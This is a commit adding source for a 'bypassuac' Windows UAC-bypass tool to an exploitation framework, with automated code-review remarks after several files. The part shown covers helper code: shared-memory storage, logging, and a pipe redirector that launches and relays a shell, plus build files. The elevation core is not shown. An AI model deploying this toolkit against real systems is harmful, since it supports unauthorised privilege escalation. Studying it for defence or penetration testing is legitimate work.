Add bypassuac source to the tree

git-svn-id: file:///home/svn/framework3/trunk@11484 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2011-01-06 17:30:20 +00:00
parent c003e4b8ef
commit 5d23306f01
35 changed files with 2587 additions and 0 deletions


@ -0,0 +1,231 @@
#include "stdafx.h"
#include "CMMN.h"
#include <Shlobj.h>
#include <sstream>
#include <windows.h>
#include <WinIOCtl.h>
/*************************************************************************************************/
/*************************************************************************************************/
/*************************************************************************************************/
std::wstring CError::Format( DWORD ErrorCode )
{
return Format( ErrorCode, NULL, NULL );
}
std::wstring CError::Format(DWORD ErrorCode, const TCHAR *Title, const TCHAR *API)
{
LPVOID lpvMessageBuffer;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM,
NULL, ErrorCode,
MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
(LPTSTR)&lpvMessageBuffer, 0, NULL);
std::wstring result;
std::wostringstream es(TEXT(""));
es << ErrorCode;
if ( Title )
{ result.append( Title ); result.append( TEXT("\n") ); }
else
{ result.append( TEXT("ERROR") ); result.append( TEXT("\n") ); }
if ( API )
{ result.append( TEXT("API = ") );result.append( API ); result.append( TEXT("\n") ); }
result.append( TEXT("error code = ") );result.append( es.str() );result.append( TEXT("\n") );
if( lpvMessageBuffer )
{ result.append( TEXT("message = ") );result.append( (TCHAR *)lpvMessageBuffer );result.append( TEXT("\n") ); }
if ( lpvMessageBuffer )
{ LocalFree(lpvMessageBuffer); }
return result;
}
/*************************************************************************************************/
/*************************************************************************************************/
/*************************************************************************************************/
CInterprocessStorage *CInterprocessStorage::Create(const TCHAR *Name, std::wstring& String)
{
CInterprocessStorage *storage = Create( Name );
if ( !storage )
return NULL;
storage->SetString( String );
return storage;
}
CInterprocessStorage *CInterprocessStorage::Create(const TCHAR *Name)
{
if ( !Name )
return NULL;
HANDLE hMap = CreateFileMapping( NULL, NULL, PAGE_READWRITE, 0, MaxSize, Name );
if ( hMap )
{
LPVOID view = MapViewOfFile( hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0 );
if ( view )
{
memset( view, 0, MaxSize );
return new CInterprocessStorage( Name, hMap, view );
}
CloseHandle( hMap );
}
return NULL;
}
CInterprocessStorage *CInterprocessStorage::Open(const TCHAR *Name)
{
if ( !Name )
return NULL;
HANDLE hMap = OpenFileMapping( FILE_MAP_ALL_ACCESS, TRUE, Name );
if ( hMap )
{
LPVOID view = MapViewOfFile( hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0 );
if ( view )
return new CInterprocessStorage( Name, hMap, view );
CloseHandle( hMap );
}
return NULL;
}
CInterprocessStorage::CInterprocessStorage(const TCHAR *Name, HANDLE Mapping, LPVOID Base)
: _Name(Name), _hMapping(Mapping), _pBase(Base)
{
}
std::wstring CInterprocessStorage::GetName()
{
return std::wstring( _Name );
}
void CInterprocessStorage::GetString(std::wstring &String)
{
String.assign( reinterpret_cast<TCHAR *>(_pBase) );
}
void CInterprocessStorage::SetString(std::wstring &String)
{
size_t count = min( String.size(), MaxCount - 1 );
memcpy( _pBase, String.data(), count * sizeof(TCHAR) );
*(reinterpret_cast<TCHAR *>(_pBase) + count) = 0;
}
bool CInterprocessStorage::GetString( const TCHAR *Name, std::wstring& String )
{
CInterprocessStorage *storage = Open( Name );
if ( !storage )
return false;
storage->GetString( String );
delete storage;
return true;
}
CInterprocessStorage::~CInterprocessStorage()
{
UnmapViewOfFile( _pBase );
CloseHandle( _hMapping );
}
/*************************************************************************************************/
/*************************************************************************************************/
/*************************************************************************************************/
std::wstring CLogger::GetPath()
{
std::wstring path;
TCHAR buffer[MAX_PATH];
if ( GetTempPath( MAX_PATH, buffer ) )
{
path.assign( buffer );
path.append( TEXT("w7e.log") );
}
return path;
}
void CLogger::Reset()
{
DeleteFile( GetPath().c_str() );
}
void CLogger::LogLine( std::wstring& Text )
{
std::wstring tmp( Text.c_str() );
tmp.append( TEXT("\n") );
Log( tmp );
}
void CLogger::LogLine( )
{
Log( TEXT("\n") );
}
void CLogger::LogLine( const TCHAR *Text )
{
if ( Text )
LogLine( std::wstring( Text ) );
}
void CLogger::Log( const TCHAR Char )
{
std::wstring tmp;
tmp.append( &Char, 1 );
Log( tmp );
}
void CLogger::Log( const TCHAR *Text )
{
if ( Text )
Log( std::wstring( Text ) );
}
void CLogger::Log( std::wstring& Text )
{
TCHAR buffer[MAX_PATH];
//
// We have to check it every time to be reflective if user created this file
// while program was runnig.
//
if ( GetModuleFileName( NULL, buffer, MAX_PATH ) )
{
std::wstring dbg( buffer );
dbg.append( TEXT(".debug") );
HANDLE hdbg = CreateFile( dbg.c_str(), FILE_READ_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
if ( INVALID_HANDLE_VALUE == hdbg )
return;
CloseHandle( hdbg );
}
HANDLE mutex = CreateMutex( NULL, FALSE, TEXT("CLoggerSync") );
if ( mutex ) WaitForSingleObject( mutex , INFINITE );
HANDLE hFile = CreateFile( GetPath().c_str(), FILE_ALL_ACCESS, 0, NULL, OPEN_ALWAYS, FILE_FLAG_WRITE_THROUGH, NULL );
if( INVALID_HANDLE_VALUE != hFile )
{
SetFilePointer( hFile, 0, NULL, FILE_END );
DWORD written;
WriteFile( hFile, Text.data(), Text.size() * sizeof(TCHAR), &written, NULL );
CloseHandle( hFile );
}
if ( mutex ) ReleaseMutex( mutex );
if ( mutex ) CloseHandle( mutex );
}
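Review bot: In the three-argument `CError::Format` the local `lpvMessageBuffer` is never initialised, so when `FormatMessage` fails the later `if( lpvMessageBuffer )` tests an indeterminate pointer and may append from, and `LocalFree`, a garbage address; declare it as `LPVOID lpvMessageBuffer = NULL;`. `CInterprocessStorage::GetString` copies from the mapped view up to the first NUL, but the view belongs to a named section that a different process may have created and filled, so a missing terminator makes the copy run past the data this class expects. Bounding it, e.g. `String.assign( p, wcsnlen( p, MaxCount ) );` with `p` the cast `_pBase`, keeps the read within the first `MaxSize` bytes. `Open` also requests `FILE_MAP_ALL_ACCESS` and an inheritable handle; if no caller writes through an opened instance (only the static `GetString` uses it in this file), `FILE_MAP_READ` and `FALSE` would be sufficient.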


@ -0,0 +1,108 @@
#pragma once
#include <windows.h>
#include <string>
//
// By Pavel
//
// This class is used for holding some data in the memory that can be accessed
// from any saparate process in the system by its name.
// It uses memeory mapped files with fixed size sections. Size is enough to hold
// as many chars as system supports for file paths.
//
// Once instance was created, it can be accessed from the another progect by the name.
// This shared object will be cleaned up when the last instance of this class will be destroyed
// across whole system.
//
// Generally, it is used following:
// 1. Create the first instance, set up data, keep it alive forever
// 2. Access to created object by its name from another prject by creating
// temporary instance of that object. After you dont need this object, destroy it.
//
class CInterprocessStorage {
public:
static const size_t MaxSize = MAX_PATH;
static const size_t MaxCount = MAX_PATH / sizeof(TCHAR);
//
// Creates initial named object or opens existing, incrementing its reference count.
// Resets all object's contents.
//
static CInterprocessStorage *Create( const TCHAR * Name );
//
// Creates initial named object or opens existing, incrementing its reference count,
// sets its value to the specified string
//
static CInterprocessStorage *Create( const TCHAR * Name, std::wstring& String );
//
// Opens existing named object. Does not modify its data.
//
static CInterprocessStorage *Open( const TCHAR * Name );
//
// Queries object's name.
//
std::wstring GetName();
//
// Queries object's value
//
void GetString( std::wstring& String );
//
// Tries to get named object's value, accessing one by the name.
//
static bool GetString( const TCHAR *Name, std::wstring& String );
//
// Sets object's Value
//
void SetString( std::wstring& String );
~CInterprocessStorage();
private:
const HANDLE _hMapping;
const LPVOID _pBase;
const TCHAR *_Name;
CInterprocessStorage( const TCHAR *Name, HANDLE Mapping, LPVOID Base );
};
//
// Logs data to file.
// Log takes place ony if one special file exists. File is named as its hosting application
// appended by .debug
// Example: Code runs in the explorer.exe => log will be allowed if near the exe
// will be placed file explorer.exe.debug
//
// It uses mutual execution to prevent unreadable content of the log file.
// Log file has path = %temp%w7e.og
//
// FILE_FLAG_WRITE_THROUGH flag is used to prevent log to be unsaved if application crashed.
//
class CLogger {
public:
static void LogLine( std::wstring& Text );
static void LogLine( const TCHAR *Text );
static void LogLine( );
static void Log( std::wstring& Text );
static void Log( const TCHAR *Text );
static void Log( const TCHAR Char );
static void Reset( );
private:
static std::wstring GetPath();
};
//
// Formats system error codes that were obtained by calling GetLastError.
//
class CError {
public:
static std::wstring Format( DWORD ErrorCode );
static std::wstring Format( DWORD ErrorCode, const TCHAR *Title, const TCHAR *API );
};
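Review bot: `MaxSize` is used as a byte count but is set to `MAX_PATH`, so in the Unicode configuration these projects build with, the section holds only `MAX_PATH / sizeof(TCHAR) - 1` characters, which contradicts the class comment that it can hold a full file path; `SetString` then truncates longer values without telling the caller. Sizing by characters keeps the constants consistent: `static const size_t MaxCount = MAX_PATH;` and `static const size_t MaxSize = MaxCount * sizeof(TCHAR);`. `_Name` stores the caller's raw pointer rather than a copy, so `GetName()` is only valid while that buffer lives; a `std::wstring` member would remove the lifetime dependency. The `CLogger` comment gives the log path as `%temp%w7e.og`, while `CLogger::GetPath` in this commit appends `w7e.log`.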


@ -0,0 +1,99 @@
#include "stdafx.h"
#include "CMMN.h"
#include "Redirector.h"
#include <windows.h>
const TCHAR *STDIn_PIPE = TEXT("\\\\.\\pipe\\TIOR_In");
const TCHAR *STDOut_PIPE = TEXT("\\\\.\\pipe\\TIOR_Out");
const TCHAR *STDErr_PIPE = TEXT("\\\\.\\pipe\\TIOR_Err");
DWORD WINAPI Redirector( LPVOID Parameter )
{
assert( Parameter );
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
CLogger::Log( TEXT("Hello redirector thread: ") );
CLogger::LogLine( pair->Name );
CHAR read_buff[2];
DWORD nBytesRead,nBytesWrote;
bool was_0d = false;
bool error = false;
while ( ! error )
{
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("ReadFile") ) );
error = true && (!pair->KeepAlive);
break;
}
if ( pair->Linux )
{
if ( ! was_0d )
{
if ( read_buff[0] == 0xa )
{
read_buff[0] = 0xd;
read_buff[1] = 0xa;
nBytesRead = 2;
}
}
was_0d = read_buff[nBytesRead - 1] == 0x0d;
}
for ( DWORD i = 0; i < nBytesRead; i++ )
{
if ( pair->DestinationConsole )
{
//
// Emulate console input.
//
INPUT_RECORD inp = {0};
inp.EventType = KEY_EVENT;
inp.Event.KeyEvent.uChar.AsciiChar = read_buff[i];
inp.Event.KeyEvent.wRepeatCount = 1;
inp.Event.KeyEvent.wVirtualKeyCode = 0;
inp.Event.KeyEvent.wVirtualScanCode = 0;
inp.Event.KeyEvent.bKeyDown = TRUE;
inp.Event.KeyEvent.dwControlKeyState = 0;
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("WriteConsoleInput") ) );
error = true && (!pair->KeepAlive);
break;
}
}
else
{
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("WriteFile") ) );
error = true && (!pair->KeepAlive);
break;
}
}
}
}
CLogger::Log( TEXT("Bye redirector thread: ") );
CLogger::LogLine( pair->Name );
return EXIT_SUCCESS;
}
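Review bot: When `ReadFile` succeeds with `nBytesRead == 0` (which a zero-length write on the other end of a pipe can produce), the `pair->Linux` branch evaluates `read_buff[nBytesRead - 1]`, and the unsigned subtraction wraps so the index lies far outside the two-byte buffer; adding `if ( nBytesRead == 0 ) continue;` directly after the `ReadFile` check avoids both that read and the test of an unwritten `read_buff[0]`. The `break` in the `ReadFile` failure branch leaves the `while` loop regardless of `KeepAlive`, whereas the same `break` in the two write branches only leaves the inner `for`, so `KeepAlive` is honoured for write errors but not for read errors; if that asymmetry is intended it deserves a comment. `assert( Parameter )` is compiled out when `NDEBUG` is defined, as the Release configurations in this commit do, so an explicit `if ( !Parameter ) return EXIT_FAILURE;` would cover both builds.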


@ -0,0 +1,44 @@
#pragma once
#include <stdio.h>
#include <tchar.h>
#include <string>
#include <windows.h>
//
// By Pavel
//
// Defines names of pipes that can be accessed by name for redirecting IO.
//
const extern TCHAR *STDIn_PIPE;
const extern TCHAR *STDOut_PIPE;
const extern TCHAR *STDErr_PIPE;
//
// Structure that is passed to newly created thread.
// Defines how to redirect IO
//
typedef struct _TRedirectorPair {
HANDLE Source;
HANDLE Destination;
//
// Uses directly Console IO instead of ReadFile and WriteFile
//
bool DestinationConsole;
HANDLE Thread;
//
// If true, prevent thread's exit on any IO error.
//
bool KeepAlive;
std::wstring Name;
//
// Appends 0x0A which is the one line terminator for linux with 0x0D. ( \r \n escapes)
//
bool Linux;
}TRedirectorPair;
DWORD WINAPI Redirector( LPVOID Parameter );
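Review bot: The three pipe-name globals are declared as pointers to const characters, but the pointers themselves are writable, so any translation unit that includes this header can repoint `STDIn_PIPE` and its siblings; declaring them as `extern const TCHAR * const STDIn_PIPE;` (with matching definitions in Redirector.cpp) makes the names immutable. The `Thread` member has no comment, and the comment on `Linux` is hard to parse; something like `// If true, a 0x0A not preceded by 0x0D is forwarded as 0x0D 0x0A.` matches what `Redirector` does with the flag.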


@ -0,0 +1,147 @@
#include "stdafx.h"
#include <windows.h>
#include ".\..\Redirector.h"
#include ".\..\CMMN.h"
//
// By Pavels
//
// This application is used for redirection data from the console to the pipes,
// not useng pipes at the other side.
// It is caused by some differences when using some other proceses which
// also redirect data. Main reason is differences in ReadConsole and ReadFile
// methods.
// Using this redirector app, child process will never know that his parent redirects it's IO.
//
// Everything is asynchronous. 3 Threads.
//
int _tmain(int argc, _TCHAR* argv[])
{
CLogger::LogLine(TEXT("TIOR: Hello"));
TRedirectorPair in = {0};
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
//in.KeepAlive = true;
in.Name.assign(TEXT("TIOR: [in]"));
if ( INVALID_HANDLE_VALUE != in.Source )
{
in.Destination = GetStdHandle( STD_INPUT_HANDLE );
in.DestinationConsole = true;
if ( INVALID_HANDLE_VALUE != in.Destination )
in.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&in, 0, NULL);
}
TRedirectorPair out = {0};
out.Destination = CreateFile( STDOut_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
out.KeepAlive = true;
out.Name.assign(TEXT("TIOR: [out]"));
if ( INVALID_HANDLE_VALUE != out.Destination )
{
SECURITY_ATTRIBUTES sa;
sa.nLength= sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
HANDLE tmp;
CreatePipe(&out.Source,&tmp,&sa,0);
SetStdHandle( STD_OUTPUT_HANDLE, tmp );
out.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&out, 0, NULL);
}
TRedirectorPair err = {0};
err.Destination = CreateFile( STDErr_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
err.KeepAlive = true;
err.Name.assign(TEXT("TIOR: [err]"));
if ( INVALID_HANDLE_VALUE != err.Destination )
{
SECURITY_ATTRIBUTES sa;
sa.nLength= sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
HANDLE tmp;
CreatePipe(&err.Source,&tmp,&sa,0);
SetStdHandle( STD_ERROR_HANDLE, tmp );
err.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&err, 0, NULL);
}
///////////////////////////////////////////////////////////////////////////////////
//
// Obtainig information about process to start and redirect
//
std::wstring shell, args, dir;
CInterprocessStorage::GetString( TEXT("w7e_TIORShell"), shell );
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
CLogger::LogLine(TEXT("TIOR: shell=")); CLogger::LogLine(shell);
CLogger::LogLine(TEXT("TIOR: args=")); CLogger::LogLine(args);
CLogger::LogLine(TEXT("TIOR: dir=")); CLogger::LogLine(dir);
STARTUPINFO si = {0};si.cb = sizeof(si);
PROCESS_INFORMATION pi = {0};
BOOL created = CreateProcess(
shell.c_str(),
const_cast<TCHAR *>(args.c_str()),
NULL,
NULL,
TRUE,
0,
NULL,
dir.c_str(),
&si,
&pi );
if ( ! created )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
TEXT("TIOR: Unable to create child process"),
TEXT("CreateProcess")));
return EXIT_FAILURE;
}
else
{
CloseHandle( pi.hThread );
}
CLogger::LogLine(TEXT("TIOR: Shell has been started. Waiting..."));
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
//
// Waiting for eny handle to be freed.
// Either some IO thread will die or process will be oevered.
//
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
CLogger::LogLine(TEXT("TIOR: Ensure that we processed all data in pipes"));
//
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
// Thats why we wait again for some period of time reading died process's output untill the end.
//
WaitForMultipleObjects( 3, waiters + 1, FALSE, 1000 );
//
// Dont forget to close child process. We need to be sure, if user terminated app which
// reads our redirected data, we terminate the target child app.
//
CLogger::LogLine(TEXT("TIOR: Killing child process"));
TerminateProcess( pi.hProcess, EXIT_FAILURE );
CloseHandle( pi.hProcess );
CLogger::LogLine(TEXT("TIOR: Exit"));
//
// I will not close any handles here - system will terminate and close all by it self.
//
return EXIT_SUCCESS;
}
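Review bot: The `waiters` array is filled with `in.Thread`, `out.Thread` and `err.Thread` unconditionally, but each of them stays NULL when its pipe could not be opened or `CreateThread` failed; `WaitForMultipleObjects` fails at once when any handle is invalid, so both waits return immediately and the child is terminated right after it starts. Collecting only the non-NULL handles, as in the fence below, keeps the waits meaningful. In the `out` and `err` blocks the result of `CreatePipe` is not checked, so on failure an uninitialised `tmp` is passed to `SetStdHandle` and the redirector thread reads from a NULL `Source`. The return values of the three `CInterprocessStorage::GetString` calls are ignored as well, and the strings they yield come from named sections that other processes appear able to create, yet they are passed to `CreateProcess` with handle inheritance enabled and no validation.

```cpp
// … unchanged: CreateProcess call and its error handling …
HANDLE waiters[4];
DWORD count = 0;
waiters[count++] = pi.hProcess;
if ( in.Thread )  waiters[count++] = in.Thread;
if ( out.Thread ) waiters[count++] = out.Thread;
if ( err.Thread ) waiters[count++] = err.Thread;
WaitForMultipleObjects( count, waiters, FALSE, INFINITE );
// … unchanged: log line before the drain wait …
if ( count > 1 )
    WaitForMultipleObjects( count - 1, waiters + 1, FALSE, 1000 );
```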


@ -0,0 +1,175 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{B36517F4-984C-422C-ADF9-85D5ACD4E30B}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>TIOR</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\CMMN.cpp" />
<ClCompile Include="..\Redirector.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
<ClCompile Include="TIOR.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -0,0 +1,39 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="TIOR.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="..\CMMN.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="..\Redirector.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>


@ -0,0 +1,3 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
</Project>


@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// TIOR.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file


@ -0,0 +1,16 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#include <stdio.h>
#include <tchar.h>
// TODO: reference additional headers your program requires here
#include <assert.h>


@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>


@ -0,0 +1,60 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
ProjectSection(SolutionItems) = preProject
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
EndProjectSection
EndProject
